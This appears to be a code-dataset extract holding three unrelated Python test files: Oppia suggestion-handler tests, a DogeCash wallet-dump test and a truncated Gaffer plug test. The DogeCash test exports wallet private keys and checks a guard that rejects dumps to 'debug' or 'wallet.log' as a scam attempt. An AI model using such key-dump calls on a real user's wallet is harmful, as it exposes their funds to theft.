'commit_message': u'commit message',
'review_message': u'Accepted!',
'skill_id': self.skill_id
}, csrf_token=csrf_token)
suggestion = suggestion_services.get_suggestion_by_id(
suggestion_to_accept['suggestion_id'])
self.assertEqual(
suggestion.status, suggestion_models.STATUS_ACCEPTED)
self.logout()
class UserSubmittedSuggestionsHandlerTest(test_utils.GenericTestBase):
AUTHOR_EMAIL = 'author@example.com'
def setUp(self):
super(UserSubmittedSuggestionsHandlerTest, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
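        # Build a published topic/story/skill hierarchy around the exploration
        # so that translation and question suggestion opportunities exist.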
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
        topic.thumbnail_bg_color = '#C6DCDA'  # Restored; '#'-comment stripping had truncated this hex literal.
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-a')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.editor_id
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
# Login and create exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getsubmittedsuggestions/topic/add_question')
self.assertEqual(response, {})
def test_question_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_skill_opportunity(self.SKILL_ID)
response = self.get_json(
'/getsubmittedsuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.SKILL_ID], None)
def test_translation_suggestions_data_for_deleted_opportunities(self):
self.login(self.AUTHOR_EMAIL)
opportunity_services.delete_exploration_opportunities([self.EXP_ID])
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
self.assertEqual(
response['target_id_to_opportunity_dict'][self.EXP_ID], None)
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/exploration/invalid_suggestion_type',
expected_status_int=400)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.AUTHOR_EMAIL)
response = self.get_json(
'/getsubmittedsuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getsubmittedsuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
class ReviewableSuggestionsHandlerTest(test_utils.GenericTestBase):
def setUp(self):
super(ReviewableSuggestionsHandlerTest, self).setUp()
self.AUTHOR_EMAIL = 'author@example.com'
self.REVIEWER_EMAIL = 'reviewer@example.com'
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.signup(self.AUTHOR_EMAIL, 'author')
self.signup(self.REVIEWER_EMAIL, 'reviewer')
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.author_id = self.get_user_id_from_email(self.AUTHOR_EMAIL)
self.reviewer_id = self.get_user_id_from_email(self.REVIEWER_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.editor = user_services.UserActionsInfo(self.editor_id)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.TOPIC_ID = 'topic'
self.STORY_ID = 'story'
self.EXP_ID = 'exp1'
# Needs to be 12 characters long.
self.SKILL_ID = 'skill1234567'
self.SKILL_DESCRIPTION = 'skill to link question to'
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, title='Exploration title',
category='Algebra', end_state_name='End State',
correctness_feedback_enabled=True)
self.publish_exploration(self.owner_id, self.EXP_ID)
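        # Build a published topic/story/skill hierarchy around the exploration
        # so that translation and question suggestion opportunities exist.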
topic = topic_domain.Topic.create_default_topic(
self.TOPIC_ID, 'topic', 'abbrev', 'description')
topic.thumbnail_filename = 'thumbnail.svg'
        topic.thumbnail_bg_color = '#C6DCDA'  # Restored; '#'-comment stripping had truncated this hex literal.
topic.subtopics = [
topic_domain.Subtopic(
1, 'Title', ['skill_id_333'], 'image.svg',
constants.ALLOWED_THUMBNAIL_BG_COLORS['subtopic'][0],
'dummy-subtopic-three')]
topic.next_subtopic_id = 2
topic_services.save_new_topic(self.owner_id, topic)
topic_services.publish_topic(self.TOPIC_ID, self.admin_id)
story = story_domain.Story.create_default_story(
self.STORY_ID, 'A story', 'Description', self.TOPIC_ID, 'story-b')
story_services.save_new_story(self.owner_id, story)
topic_services.add_canonical_story(
self.owner_id, self.TOPIC_ID, self.STORY_ID)
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.admin_id)
story_services.update_story(
self.owner_id, self.STORY_ID, [story_domain.StoryChange({
'cmd': 'add_story_node',
'node_id': 'node_1',
'title': 'Node1',
}), story_domain.StoryChange({
'cmd': 'update_story_node_property',
'property_name': 'exploration_id',
'node_id': 'node_1',
'old_value': None,
'new_value': self.EXP_ID
})], 'Changes.')
self.save_new_skill(
self.SKILL_ID, self.owner_id, description=self.SKILL_DESCRIPTION)
user_services.allow_user_to_review_question(self.reviewer_id)
user_services.allow_user_to_review_translation_in_language(
self.reviewer_id, 'hi')
# Login and update exploration and suggestions.
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.owner_id, self.EXP_ID, [
exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': '<p>new content html</p>'
}
})], 'Add content')
self.logout()
self.login(self.AUTHOR_EMAIL)
csrf_token = self.get_new_csrf_token()
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_TRANSLATE_CONTENT),
'target_type': (feconf.ENTITY_TYPE_EXPLORATION),
'target_id': self.EXP_ID,
'target_version_at_submission': exploration.version,
'change': {
'cmd': exp_domain.CMD_ADD_TRANSLATION,
'state_name': 'Introduction',
'content_id': 'content',
'language_code': 'hi',
'content_html': '<p>new content html</p>',
'translation_html': '<p>new content html in Hindi</p>'
},
'description': 'Adds translation',
}, csrf_token=csrf_token)
self.question_dict = {
'question_state_data': self._create_valid_question_data(
'default_state').to_dict(),
'language_code': 'en',
'question_state_data_schema_version': (
feconf.CURRENT_STATE_SCHEMA_VERSION),
'linked_skill_ids': [self.SKILL_ID],
'inapplicable_skill_misconception_ids': ['skillid12345-1']
}
self.post_json(
'%s/' % feconf.SUGGESTION_URL_PREFIX, {
'suggestion_type': (
feconf.SUGGESTION_TYPE_ADD_QUESTION),
'target_type': feconf.ENTITY_TYPE_SKILL,
'target_id': self.SKILL_ID,
'target_version_at_submission': 1,
'change': {
'cmd': (
question_domain
.CMD_CREATE_NEW_FULLY_SPECIFIED_QUESTION),
'question_dict': self.question_dict,
'skill_id': None,
'skill_difficulty': 0.3
},
'description': 'Add new question to skill'
}, csrf_token=csrf_token)
self.logout()
def test_exploration_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/translate_content')
self.assertEqual(response, {})
def test_skill_handler_returns_data(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/skill/add_question')
self.assertEqual(len(response['suggestions']), 1)
self.assertEqual(len(response['target_id_to_opportunity_dict']), 1)
response = self.get_json(
'/getreviewablesuggestions/topic/add_question')
self.assertEqual(response, {})
def test_handler_with_invalid_suggestion_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/exploration/invalid_suggestion_type',
expected_status_int=404)
def test_handler_with_invalid_target_type_raise_error(self):
self.login(self.REVIEWER_EMAIL)
response = self.get_json(
'/getreviewablesuggestions/exploration/translate_content')
self.assertEqual(len(response['suggestions']), 1)
self.get_json(
'/getreviewablesuggestions/invalid_target_type'
'/translate_content', expected_status_int=400)
| true
| true
|
1c4484ec00c3b5a988f8610e8065d78bbfbd8918
| 5,672
|
py
|
Python
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 52
|
2018-10-08T07:17:35.000Z
|
2021-11-29T22:53:08.000Z
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 50
|
2018-10-20T10:42:54.000Z
|
2021-02-15T21:53:51.000Z
|
test/functional/wallet_dump.py
|
Nugetzrul3/dogecash
|
f09a4ed70e9ea6f5599c8a20fe255cbe24373cc1
|
[
"MIT"
] | 53
|
2018-11-03T16:42:43.000Z
|
2021-12-11T03:55:21.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2016-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the dumpwallet RPC."""
import os
from test_framework.test_framework import DogeCashTestFramework
from test_framework.util import (assert_equal, assert_raises_rpc_error)
def read_dump(file_name, addrs, hd_master_addr_old):
"""
Read the given dump, count the addrs that match, count change and reserve.
Also check that the old hd_master is inactive
"""
with open(file_name, encoding='utf8') as inputfile:
found_addr = 0
found_addr_chg = 0
found_addr_rsv = 0
hd_master_addr_ret = None
for line in inputfile:
            # only read non-comment lines
if line[0] != "#" and len(line) > 10:
# split out some data
key_date_label, comment = line.split("#")
key_date_label = key_date_label.split(" ")
date = key_date_label[1]
keytype = key_date_label[2]
imported_key = date == '1970-01-01T00:00:01Z'
if imported_key:
                    # Imported keys have multiple addresses and no label
                    # (keypath) or timestamp, so skip them.
continue
addr_keypath = comment.split(" addr=")[1]
addr = addr_keypath.split(" ")[0]
keypath = None
if keytype == "hdseed=1":
# ensure we have generated a new hd master key
assert hd_master_addr_old != addr
hd_master_addr_ret = addr
elif keytype == "script=1":
# scripts don't have keypaths
keypath = None
else:
keypath = addr_keypath.rstrip().split("hdkeypath=")[1]
# count key types
for addrObj in addrs:
if addrObj['address'] == addr.split(",")[0] and addrObj['hdkeypath'] == keypath and keytype == "label=":
if addr.startswith('x') or addr.startswith('y'):
# P2PKH address
found_addr += 1
# else: todo: add staking/anonymous addresses here
break
elif keytype == "change=1":
found_addr_chg += 1
break
elif keytype == "reserve=1":
found_addr_rsv += 1
break
return found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_ret
class WalletDumpTest(DogeCashTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [["-keypool=90"]]
self.rpc_timewait = 90
def setup_network(self, split=False):
        # Use a longer RPC timeout (90 seconds, set via rpc_timewait above)
        # because the initial getnewaddress RPC can take longer than the
        # default 30 seconds due to an expensive CWallet::TopUpKeyPool call,
        # and the encryptwallet RPC made later in the test often takes even
        # longer.
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
    def run_test(self):
tmpdir = self.options.tmpdir
# generate 20 addresses to compare against the dump
test_addr_count = 20
addrs = []
        for i in range(0, test_addr_count):
addr = self.nodes[0].getnewaddress()
vaddr = self.nodes[0].getaddressinfo(addr) # required to get hd keypath
addrs.append(vaddr)
# Should be a no-op:
self.nodes[0].keypoolrefill()
# dump unencrypted wallet
dumpUnencrypted = os.path.join(tmpdir, "node0", "wallet.unencrypted.dump")
result = self.nodes[0].dumpwallet(dumpUnencrypted)
assert_equal(result['filename'], os.path.abspath(dumpUnencrypted))
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_unenc = \
read_dump(dumpUnencrypted, addrs, None)
assert_equal(found_addr, test_addr_count) # all keys must be in the dump
        assert_equal(found_addr_chg, 50)  # 50 blocks were mined
        assert_equal(found_addr_rsv, 90 * 3)  # 90 external + 90 internal + 90 staking keys
        # Encrypt wallet, restart, unlock and dump.
self.nodes[0].node_encrypt_wallet('test')
self.start_node(0)
self.nodes[0].walletpassphrase('test', 10)
# Should be a no-op:
self.nodes[0].keypoolrefill()
dumpEncrypted = os.path.join(tmpdir, "node0", "wallet.encrypted.dump")
self.nodes[0].dumpwallet(dumpEncrypted)
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_enc = \
read_dump(dumpEncrypted, addrs, hd_master_addr_unenc)
assert_equal(found_addr, test_addr_count)
assert_equal(found_addr_chg, 90 * 3 + 1 + 50) # old reserve keys are marked as change now. todo: The +1 needs to be removed once this is updated (master seed taken as an internal key)
assert_equal(found_addr_rsv, 90 * 3) # 90 external + 90 internal + 90 staking
# Overwriting should fail
assert_raises_rpc_error(-8, "already exists", self.nodes[0].dumpwallet, dumpUnencrypted)
# Keyword matching should fail
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "debug")
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "wallet.log")
if __name__ == '__main__':
WalletDumpTest().main()
| 42.646617
| 192
| 0.603491
|
import os
from test_framework.test_framework import DogeCashTestFramework
from test_framework.util import (assert_equal, assert_raises_rpc_error)
def read_dump(file_name, addrs, hd_master_addr_old):
with open(file_name, encoding='utf8') as inputfile:
found_addr = 0
found_addr_chg = 0
found_addr_rsv = 0
hd_master_addr_ret = None
for line in inputfile:
if line[0] != "#" and len(line) > 10:
key_date_label, comment = line.split("#")
key_date_label = key_date_label.split(" ")
date = key_date_label[1]
keytype = key_date_label[2]
imported_key = date == '1970-01-01T00:00:01Z'
if imported_key:
continue
addr_keypath = comment.split(" addr=")[1]
addr = addr_keypath.split(" ")[0]
keypath = None
if keytype == "hdseed=1":
assert hd_master_addr_old != addr
hd_master_addr_ret = addr
elif keytype == "script=1":
keypath = None
else:
keypath = addr_keypath.rstrip().split("hdkeypath=")[1]
# count key types
for addrObj in addrs:
if addrObj['address'] == addr.split(",")[0] and addrObj['hdkeypath'] == keypath and keytype == "label=":
if addr.startswith('x') or addr.startswith('y'):
# P2PKH address
found_addr += 1
# else: todo: add staking/anonymous addresses here
break
elif keytype == "change=1":
found_addr_chg += 1
break
elif keytype == "reserve=1":
found_addr_rsv += 1
break
return found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_ret
class WalletDumpTest(DogeCashTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.extra_args = [["-keypool=90"]]
self.rpc_timewait = 90
def setup_network(self, split=False):
# Use a 90 second RPC timeout because the initial getnewaddress RPC can take
# longer than the default 30 seconds due to an expensive
# CWallet::TopUpKeyPool call, and the encryptwallet RPC made later in
# the test often takes even longer.
self.add_nodes(self.num_nodes, self.extra_args)
self.start_nodes()
def run_test(self):
tmpdir = self.options.tmpdir
# generate 20 addresses to compare against the dump
test_addr_count = 20
addrs = []
for i in range(0,test_addr_count):
addr = self.nodes[0].getnewaddress()
vaddr = self.nodes[0].getaddressinfo(addr) # required to get hd keypath
addrs.append(vaddr)
# Should be a no-op:
self.nodes[0].keypoolrefill()
# dump unencrypted wallet
dumpUnencrypted = os.path.join(tmpdir, "node0", "wallet.unencrypted.dump")
result = self.nodes[0].dumpwallet(dumpUnencrypted)
assert_equal(result['filename'], os.path.abspath(dumpUnencrypted))
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_unenc = \
read_dump(dumpUnencrypted, addrs, None)
assert_equal(found_addr, test_addr_count) # all keys must be in the dump
assert_equal(found_addr_chg, 50)  # 50 blocks were mined
assert_equal(found_addr_rsv, 90 * 3)  # 90 external + 90 internal + 90 staking keys
#encrypt wallet, restart, unlock and dump
self.nodes[0].node_encrypt_wallet('test')
self.start_node(0)
self.nodes[0].walletpassphrase('test', 10)
# Should be a no-op:
self.nodes[0].keypoolrefill()
dumpEncrypted = os.path.join(tmpdir, "node0", "wallet.encrypted.dump")
self.nodes[0].dumpwallet(dumpEncrypted)
found_addr, found_addr_chg, found_addr_rsv, hd_master_addr_enc = \
read_dump(dumpEncrypted, addrs, hd_master_addr_unenc)
assert_equal(found_addr, test_addr_count)
assert_equal(found_addr_chg, 90 * 3 + 1 + 50) # old reserve keys are marked as change now. todo: The +1 needs to be removed once this is updated (master seed taken as an internal key)
assert_equal(found_addr_rsv, 90 * 3) # 90 external + 90 internal + 90 staking
# Overwriting should fail
assert_raises_rpc_error(-8, "already exists", self.nodes[0].dumpwallet, dumpUnencrypted)
# Keyword matching should fail
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "debug")
assert_raises_rpc_error(-1, "Scam attempt detected!", self.nodes[0].dumpwallet, "wallet.log")
if __name__ == '__main__':
WalletDumpTest().main()
| true
| true
|
1c4485f443652f42f9ae85bde81f45cc658539e0
| 16941
|
py
|
Python
|
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTest/CompoundDataPlugTest.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | null | null | null |
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import imath
import IECore
import Gaffer
import GafferTest
class CompoundDataPlugTest( GafferTest.TestCase ) :
def test( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.IntData( 10 ), "member1" )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
self.assertEqual( m1.getName(), "member1" )
self.assertEqual( m1["name"].getValue(), "a" )
self.assertEqual( m1["value"].getValue(), 10 )
self.failIf( "enabled" in m1 )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.IntData( 10 ) )
self.assertEqual( n, "a" )
m1["name"].setValue( "b" )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.IntData( 10 ) )
self.assertEqual( n, "b" )
m2 = Gaffer.NameValuePlug( "c", IECore.FloatData( .5 ), "member1" )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
self.assertEqual( m2.getName(), "member2" )
self.assertEqual( m2["name"].getValue(), "c" )
self.assertEqual( m2["value"].getValue(), .5 )
self.failIf( "enabled" in m2 )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.FloatData( .5 ) )
self.assertEqual( n, "c" )
m3 = Gaffer.NameValuePlug( "o", IECore.StringData( "--" ), True, name = "m" )
p.addChild( m3 )
self.failUnless( isinstance( m3, Gaffer.ValuePlug ) )
self.assertEqual( m3.getName(), "m" )
self.assertEqual( m3["name"].getValue(), "o" )
self.assertEqual( m3["value"].getValue(), "--" )
self.failUnless( "enabled" in m3 )
self.assertEqual( m3["enabled"].getValue(), True )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, IECore.StringData( "--" ) )
self.assertEqual( n, "o" )
m3["enabled"].setValue( False )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, None )
self.assertEqual( n, "" )
# test if creating a plug from data that has a geometric
# interpretation specified transfers that interpretation to the plug
m4 = Gaffer.NameValuePlug( "vector", IECore.V3fData( imath.V3f( 0 ), IECore.GeometricData.Interpretation.Vector ), True, name = "vector" )
p.addChild( m4 )
self.assertEqual( m4["value"].interpretation(), IECore.GeometricData.Interpretation.Vector )
def testVectorData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.FloatVectorData( [ 1, 2, 3 ] ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.FloatVectorData( [ 1, 2, 3 ] ) )
self.assertEqual( n, "a" )
m2 = Gaffer.NameValuePlug( "b", IECore.IntVectorData( [ 1, 2, 3 ] ) )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.IntVectorData( [ 1, 2, 3 ] ) )
self.assertEqual( n, "b" )
m3 = Gaffer.NameValuePlug( "c", IECore.StringVectorData( [ "1", "2", "3" ] ) )
p.addChild( m3 )
self.failUnless( isinstance( m3, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m3 )
self.assertEqual( d, IECore.StringVectorData( [ "1", "2", "3" ] ) )
self.assertEqual( n, "c" )
m4 = Gaffer.NameValuePlug( "d", IECore.V3fVectorData( [ imath.V3f( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m4 )
self.failUnless( isinstance( m4, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m4 )
self.assertEqual( d, IECore.V3fVectorData( [ imath.V3f( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "d" )
m5 = Gaffer.NameValuePlug( "e", IECore.Color3fVectorData( [ imath.Color3f( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m5 )
self.failUnless( isinstance( m5, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m5 )
self.assertEqual( d, IECore.Color3fVectorData( [ imath.Color3f( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "e" )
m6 = Gaffer.NameValuePlug( "f", IECore.M44fVectorData( [ imath.M44f() * x for x in range( 1, 5 ) ] ) )
p.addChild( m6 )
self.failUnless( isinstance( m6, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m6 )
self.assertEqual( d, IECore.M44fVectorData( [ imath.M44f() * x for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "f" )
m7 = Gaffer.NameValuePlug( "d", IECore.V2iVectorData( [ imath.V2i( x ) for x in range( 1, 5 ) ] ) )
p.addChild( m7 )
self.failUnless( isinstance( m7, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m7 )
self.assertEqual( d, IECore.V2iVectorData( [ imath.V2i( x ) for x in range( 1, 5 ) ] ) )
self.assertEqual( n, "d" )
def testImathVectorData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.V3fData( imath.V3f( 1, 2, 3 ) ) )
self.assertEqual( n, "a" )
m2 = Gaffer.NameValuePlug( "b", IECore.V2fData( imath.V2f( 1, 2 ) ) )
p.addChild( m2 )
self.failUnless( isinstance( m2, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m2 )
self.assertEqual( d, IECore.V2fData( imath.V2f( 1, 2 ) ) )
self.assertEqual( n, "b" )
def testImathMatrixData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", IECore.M44fData( imath.M44f( *range(16) ) ) )
p.addChild( m1 )
self.failUnless( isinstance( m1, Gaffer.ValuePlug ) )
d, n = p.memberDataAndName( m1 )
self.assertEqual( d, IECore.M44fData( imath.M44f( *range(16) ) ) )
self.assertEqual( n, "a" )
def testTransformPlugData( self ) :
p = Gaffer.CompoundDataPlug()
m1 = Gaffer.NameValuePlug( "a", Gaffer.TransformPlug() )
p.addChild( m1 )
